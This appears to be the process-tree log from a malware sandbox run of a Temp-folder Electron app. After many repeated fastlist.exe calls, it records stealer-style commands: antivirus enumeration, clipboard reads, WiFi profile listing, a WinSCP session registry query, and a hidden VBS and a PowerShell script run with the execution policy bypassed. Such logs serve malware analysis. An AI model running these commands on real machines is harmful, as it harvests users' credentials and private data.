- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4924
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4044
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7892
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7764
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6780
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6876
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2180
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1028
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1664
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3232
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5404
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6800
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7904
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5840
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7264
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6812
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5676
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8052
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5748
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7968
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5308
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7208
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5688
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6596
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4184
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6912
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3868
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5324
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7980
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:8112
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7476
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:872
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2956
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7620
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3080
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4920
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6564
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3152
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:612
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:3060
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5824
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7380
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:640
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7568
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5012
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6380
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7928
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7916
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6080
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6212
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1012
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5356
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2300
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5436
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:2444
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5420
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7272
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7572
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5916
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6708
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6036
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7040
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7784
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7636
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6472
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4396
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6600
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1088
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6764
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:1828
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4040
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4284
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:6464
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5628
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5560
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:5080
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\fsH2kp5H9YIj.vbs"
    3⤵
    PID:4864
  - - C:\Windows\system32\cscript.exe
      cscript C:\Users\Admin\AppData\Roaming\fsH2kp5H9YIj.vbs
      4⤵
      PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "mullvad account get"
    3⤵
    PID:7392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -command "function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace "root\\SecurityCenter2" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { "262144" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "262160" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "266240" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "266256" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "393216" { $defstatus = "Up to date"; $rtstatus = "Disabled" } "393232" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "393488" { $defstatus = "Out of date"; $rtstatus = "Disabled" } "397312" { $defstatus = "Up to date"; $rtstatus = "Enabled" } "397328" { $defstatus = "Out of date"; $rtstatus = "Enabled" } "397584" { $defstatus = "Out of date"; $rtstatus = "Enabled" } default { $defstatus = "Unknown"; $rtstatus = "Unknown" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct ""
    3⤵
    PID:8120
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "function Get-AntiVirusProduct {
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6104
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      PID:5668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile"
    3⤵
    PID:6724
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      PID:7144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
    3⤵
    PID:5944
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
      4⤵
      PID:5268
- - C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    C:\Users\Admin\AppData\Local\Temp\2h3nr8UMJYpq3BAbQb7xDnBudBM\resources\app.asar.unpacked\node_modules\ps-list\fastlist.exe
    3⤵
    PID:7808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutMnc3W.ps1" -RunAsAdministrator"
    3⤵
    PID:5076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salutMnc3W.ps1" -RunAsAdministrator
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard"
    3⤵
    PID:6096
